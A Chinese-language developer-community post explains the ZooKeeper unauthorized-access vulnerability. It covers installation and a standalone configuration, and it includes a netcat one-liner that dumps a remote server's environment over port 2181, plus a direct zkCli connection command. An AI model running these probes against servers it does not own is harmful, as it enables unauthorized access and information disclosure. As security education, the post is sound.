AI 助理
备案控制台
开发者社区 安全 文章 正文

ZooKeeper 未授权访问漏洞

2018-01-30 9630
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云原生网关 MSE Higress,422元/月
任务调度 XXL-JOB 版免费试用,400 元额度,开发版规格
服务治理 MSE Sentinel/OpenSergo,Agent数量 不受限
简介: ZooKeeper 安装: Zookeeper的默认开放端口是2181 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.

 

ZooKeeper 安装:

Zookeeper的默认开放端口是2181

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz

tar -zxvf zookeepre-3.4.10.tar.gz
cd zookeeper-3.4.10/
cd conf/
vi zoo.cfg
###配置单机模式
tickTime=2000    
dataDir=/tmp/zookeeper/data    
dataLogDir=/tmp/zookeeper/logs    
clientPort=2181 

bin/zkServer.sh start   //启动
#启动client连接server
bin/zkCli.sh -server localhost:2181

漏洞验证:

执行以下命令即可远程获取该服务器的环境:

echo envi|nc 192.168.15.74 2181

直接连接:
./zkCli.sh -server ip:port

 

 

 

 

 

参考链接:

Zookeeper 安装和配置

http://coolxing.iteye.com/blog/1871009

文章标签:
微服务引擎
Apache
安全
关键词:
微服务引擎访问
相关实践学习
基于MSE实现微服务的全链路灰度
通过本场景的实验操作,您将了解并实现在线业务的微服务全链路灰度能力。
bypass
目录
相关文章
蚂蚁小黑
|
安全 Java 数据安全/隐私保护
ZooKeeper 未授权访问漏洞利用
ZooKeeper 未授权访问漏洞利用
蚂蚁小黑
1889 1
JAVA旭阳
|
缓存 Java API
Zookeeper系列(五)——使用Curator访问Zookeeper详解
Zookeeper系列(五)——使用Curator访问Zookeeper详解
JAVA旭阳
1012 0
Zookeeper系列(五)——使用Curator访问Zookeeper详解
李白你好
|
分布式计算 安全 数据可视化
目标Zookeeper未授权访问(漏洞验证)
目标Zookeeper未授权访问(漏洞验证)
李白你好
1434 0
目标Zookeeper未授权访问(漏洞验证)
@dailidong@
|
监控 Java 数据库连接
[解决] HiveServer2中使用jdbc访问hbase时导致ZooKeeper连接持续增加的解决
最近在监控中发现HiveServer2连接到zookeeper里的连接持续上涨,很奇怪,虽然知道HiveServer2支持并发连接,使用ZooKeeper来管理Hive表的读写锁,但我们的环境并不需要这些,我们已经关闭并发功能,以下是线上的配置,甚至把这些值都改成final了。
@dailidong@
1765 0
1176112968452250
|
5月前
|
安全 应用服务中间件 API
微服务分布式系统架构之zookeeper与dubbo-2
微服务分布式系统架构之zookeeper与dubbo-2
1176112968452250
113 1
1176112968452250
|
5月前
|
负载均衡 Java 应用服务中间件
微服务分布式系统架构之zookeeper与dubbor-1
微服务分布式系统架构之zookeeper与dubbor-1
1176112968452250
110 1
蓝染-惣右介
|
2月前
|
存储 SpringCloudAlibaba Java
【SpringCloud Alibaba系列】一文全面解析Zookeeper安装、常用命令、JavaAPI操作、Watch事件监听、分布式锁、集群搭建、核心理论
一文全面解析Zookeeper安装、常用命令、JavaAPI操作、Watch事件监听、分布式锁、集群搭建、核心理论。
蓝染-惣右介
107 1
【SpringCloud Alibaba系列】一文全面解析Zookeeper安装、常用命令、JavaAPI操作、Watch事件监听、分布式锁、集群搭建、核心理论
1176112968452250
|
5月前
|
存储 负载均衡 Dubbo
分布式-Zookeeper(一)
分布式-Zookeeper(一)
1176112968452250
54 0
阿里云开发者
|
3月前
|
存储 运维 NoSQL
分布式读写锁的奥义:上古世代 ZooKeeper 的进击
本文作者将介绍女娲对社区 ZooKeeper 在分布式读写锁实践细节上的思考,希望帮助大家理解分布式读写锁背后的原理。
阿里云开发者
114 11
萝卜丝丸子
|
7月前
|
监控 NoSQL Java
分布式锁实现原理问题之ZooKeeper的观察器(Watcher)特点问题如何解决
分布式锁实现原理问题之ZooKeeper的观察器(Watcher)特点问题如何解决
萝卜丝丸子
63 0

热门文章

最新文章

  • 1
    微服务引擎 MSE:打造通用的企业级微服务架构
  • 2
    阿里云微服务引擎 MSE 及 云原生 API 网关 2025 年 1 月产品动态
  • 3
    尼恩一键开发环境: vagrant+java+springcloud+redis+zookeeper镜像下载(&制作详解)
  • 4
    微服务引擎 MSE 及云原生 API 网关 2025 年 1 月产品动态
  • 5
    注册中心如何选型?Eureka、Zookeeper、Nacos怎么选
  • 6
    阿里云微服务引擎 MSE 及 云原生 API 网关 2024 年 12 月产品动态
  • 7
    如何设计一个注册中心?以Zookeeper为例
  • 8
    【SpringCloud Alibaba系列】一文全面解析Zookeeper安装、常用命令、JavaAPI操作、Watch事件监听、分布式锁、集群搭建、核心理论
  • 9
    微服务引擎 MSE 及云原生 API 网关 2024 年 12 月产品动态
  • 10
    Dubbo的Zookeeper单机配置和Zookeeper集群配置
  • 1
    【机器学习】平均绝对误差 (MAE) 与均方误差 (MSE) 有什么区别?
    7265
  • 2
    分布式系统的一致性级别划分及Zookeeper一致性级别分析
    124
  • 3
    云原生最佳实践系列 4:基于 MSE 和 SAE 的微服务部署与压测
    747
  • 4
    快速入门分布式系统与Dubbo+zookeeper Demo
    501
  • 5
    云效 AppStack + 阿里云 MSE 实现应用服务全链路灰度
    91239
  • 6
    三个微服务注册中心eureka、consul、zookeeper之间的异同点以及CAP理论图
    366
  • 7
    ZooKeeper基本架构
    235
  • 8
    云效AppStack+阿里云MSE实现应用服务全链路灰度
    121643
  • 9
    分布式锁【数据库乐观锁实现的分布式锁、Zookeeper分布式锁原理、Redis实现的分布式锁】(三)-全面详解(学习总结---从入门到深化)
    374
  • 10
    在docker中安装zookeeper,并且阿里云服务器配置
    332

    • 相关课程

    更多
  • 基于MSE的大促场景流量入口防护最佳实践
  • Dubbo + ZooKeeper 的服务发现最佳实践
  • MSE微服务测试最佳实践 - 自动化回归
  • 基于Zookeeper、Dubbo构建互联网分布式基础架构
  • 大数据ZooKeeper快速入门
  • 分布式协调系统 Zookeeper 快速入门

    • 相关电子书

    更多
  • 《MSE 微服务网关》
  • 微服务引擎 MSE 治理中心重磅发布
  • 阿里云微服务引擎 MSE 2.0 线上发布

    • 相关实验场景

    更多
  • 基于MSE实现微服务的全链路灰度
  • 基于MSE实现K8s集群内多服务的灰度发布
    • 下一篇
    PAI Model Gallery 支持云上一键部署 DeepSeek-V3、DeepSeek-R1 系列模型